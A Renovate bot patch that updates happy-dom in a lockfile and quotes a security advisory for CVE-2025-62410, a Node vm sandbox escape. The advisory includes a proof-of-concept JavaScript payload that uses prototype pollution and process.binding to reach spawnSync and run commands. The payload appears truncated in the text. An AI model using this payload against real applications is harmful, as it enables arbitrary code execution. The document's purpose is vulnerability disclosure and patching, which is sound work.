From a47042cbd59a93c8a7227a20c43f9f59937f251e Mon Sep 17 00:00:00 2001 From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com> Date: Tue, 21 Oct 2025 16:13:36 +0000 Subject: [PATCH] chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | [![age](https://developer.mend.io/api/mc/badges/age/npm/happy-dom/20.0.2?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/happy-dom/20.0.0/20.0.2?slim=true)](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5) ### Summary The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads. ### Details The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf). ### PoC Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn(). ```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c Hello world!`; await browser.close(); console.log(`The process object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes
capricorn86/happy-dom (happy-dom) ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@​cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this! - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> --- yarn.lock | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yarn.lock b/yarn.lock index 2bddcab482..9ec9c8eeb3 100644 --- a/yarn.lock +++ b/yarn.lock @@ -23665,13 +23665,13 @@ __metadata: linkType: hard "happy-dom@npm:^20.0.0": - version: 20.0.0 - resolution: "happy-dom@npm:20.0.0" + version: 20.0.7 + resolution: "happy-dom@npm:20.0.7" dependencies: "@types/node": "npm:^20.0.0" "@types/whatwg-mimetype": "npm:^3.0.2" whatwg-mimetype: "npm:^3.0.0" - checksum: 10/0fa626e2051dfa5f1ea0da9e3776b5986d3700c261a8ba7c496e7ad89f4df0318920b7c286d3b310481712b378ffb7dee35ed782ff039e4166f4ba957a76b6df + checksum: 10/1161bfe8fcac0fd093b8fbe8af29e8a6525437f17424be97b21401f0741e6473541b30b080066a32990b884eae4b83a1fd1f948a52607975bc98d1b90b394509 languageName: node linkType: hard